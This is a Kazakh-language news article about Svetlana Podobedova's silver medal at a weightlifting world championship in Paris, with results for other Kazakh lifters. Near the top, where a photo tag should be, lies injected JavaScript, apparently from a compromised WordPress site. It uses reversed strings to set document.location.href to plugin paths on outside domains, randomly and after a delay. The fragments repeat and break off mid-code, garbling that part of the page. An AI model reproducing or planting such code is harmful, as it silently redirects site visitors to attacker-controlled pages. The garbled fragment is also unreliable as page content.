Светлана Подобедова ауыр атлетикадан әлем чемпионатында күміс жүлдені қанағат тұтты

Светлана Подобедова ауыр атлетикадан әлем чемпионатында күміс жүлдені қанағат тұтты

434_f7eb68003e11bb9ce2d8dcdb6b3f0b4d$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/434_f7eb68003e11bb9ce2d8dcdb6b3f0b4d.jpg» height=»298″ width=»434″ />

АСТАНА. 11 қараша. ҚазАқпарат — Қазақстан спортшысы Светлана Подобедова Парижде өтіп жатқан ауыр атлетикадан әлем чемпионатында күміс жүлдені қанжығасына байлады

75 келіге дейінгі салмақ санатында жарыс жолына шыққан қазақстандық ауыр атлет екі сайыстың қорытындысы бойынша 287 келіні бағындырып, күміс жүлдеге ие болды. Жұлқа көтеруде 131 келіні бағындырған ол осы сайыстың кіші алтын медалін, ал серпе көтеруде 156 келіні көтеріп кіші күміс медалін қанжығасына байлады. Екі сайыстың қорытындысы бойынша үлкен алтын медаль 293 келіні көтерген ресейлік спортшы Надежда Евстюхинаға, ал қола медаль корейлік Ким Юн Жу-ға бұйырды.  Осы салмақ санатында өнер көрсеткен Қазақстанның тағы бір спортшысы Анна Нұрмахамбетова 7-ші орынға табан тіреді.

Айта кетейік, әлемдік додаға Олимпиада жеңімпазы Илья Ильин мен жас дарын Алмас Өтешев 94 келі салмақ бойынша қатысады. Ал Әлем чемпионы Владимир Седов 105 келіде бақ сынайды. Сондай-ақ 105 келіде Сергей Истомин өз күшін әйгілемек. 85 келіде Владимир Кузнецов, 105 келіден жоғары салмақта Дмитрий Каплин мен Александр Заичиков сынды зілтеміршілерге сенім артылып отыр.

Париж қаласындағы ауыр атлетикадан өтетін әлем чемпионатының тартысты бәсекелерін Қазақстанның «Еларнасы» және «Еуроспорт» телеарналары көрсетуде.

Естеріңізге сала кетейік, 6 қараша күні жарыс жолына шыққан Қазақстан спортшысы Зүлфия Чиншанло 53 келі салмақ санатында жұлқа көтеруде де, серпе көтеруде де ең үздік спортшы екенін дәлелдеп, қоссайыс нәтижесінде әлемнің екі дүркін чемпионы атанған болатын. Зүлфия Чиншанло 2009 жылғы әлем чемпионы, Гуанчжоуда өткен Азия ойындарының күміс жүлдегері, Қазақстанның үш дүркін чемпионы.

Ал 63 келі салмақ санатында жарыс жолына шыққан М.Манеза жұлқа көтеруде 109 келіні бағындырып кіші қола медальға, ал серпе көтеруде 139 келіні еңсеріп кіші алтын медальға ие болды. Екі сайыстың қорытындысында үлкен күміс медальды қанжығасына байлады. Өкініштісі, серпе көтеру сайысында 147 келіге тапсырыс берген қазақстандық спортшы оны еркін еңсергенімен, төрешілер тарабы есепке алмай қойды. Ал осы салмақ санатында әлем чемпионы атанған ресейлік Светлана Царукаева жұлқа көтеруде 117 келіні бағындырып, әлем рекордын жаңартты. Есте болса, дәл осы спортшы 2009 жылы Оңтүстік Кореяның Коян қаласында өткен әлем чемпионатында М.Манезамен бірдей салмақты бағындырғанымен өз салмағының біздің спортшыдан сәл ауыр болуына байланысты күміс жүлдені қанағат тұтқан болатын.

Ал 69 келі бойынша жарыс жолына шыққан Ирина Некрасова 9-шы, Жазира Жапарқұл 17-ші орынға тұрақтаған болатын.

Әлем чемпионаты 13 қараша күні аяқталады.

http://www.inform.kz/kaz/article/2418352

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика